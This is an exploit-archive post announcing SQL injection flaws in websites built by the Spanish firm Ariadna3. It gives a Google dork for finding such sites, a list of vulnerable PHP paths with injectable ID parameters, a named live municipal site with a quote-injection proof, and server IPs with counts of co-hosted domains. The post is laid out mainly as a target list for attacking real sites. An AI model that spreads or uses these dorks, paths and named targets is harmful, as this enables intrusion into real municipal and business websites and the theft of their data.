facebook facebook twitter rss

Ariadna3 Web Design Spain SQL Injection

Author: KingSkrupellos , Published: 18-01-2019
####################################################################

# Exploit Title : Ariadna3 Web Design Spain SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 15/01/2019
# Vendor Homepage : ariadna3.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Powered by ariadna3.com''
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]

####################################################################

# SQL Injection Exploit :
***********************

/THIS-PATH-CHANGES/fotografia-galerias.php?ID=[SQL Injection]

/turismo/fotografia-galerias.php?ID=[SQL Injection]

/participa/resource-visagen2.php?sc=participa&ap=actividades&ID=[SQL Injection]

/rutadeldestierro/lib/visualimg.php?IDimg=[SQL Injection]

/ayuntamiento/noticias.php?ID=[SQL Injection]

/noticias.php?ID=[SQL Injection]

/ayuntamiento/bandos.php?ID=[SQL Injection]

/bandos.php?ID=[SQL Injection]

####################################################################

# Example Vulnerable Site :
*************************

[+] aytoateca.es/turismo/fotografia-galerias.php?ID=59%27 =>

[ Proof of Concept ] => archive.is/ePNRc

Note : (46.231.127.49) => There are 267 domains hosted on this server.

Note : (46.231.127.24) => There are 293 domains hosted on this server.

####################################################################

# SQL Database Error :
**********************

You have an error in your SQL syntax; check the manual that corresponds

to your MySQL server version for the right syntax to use near '\'' at line 1

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################

Like us on Facebook :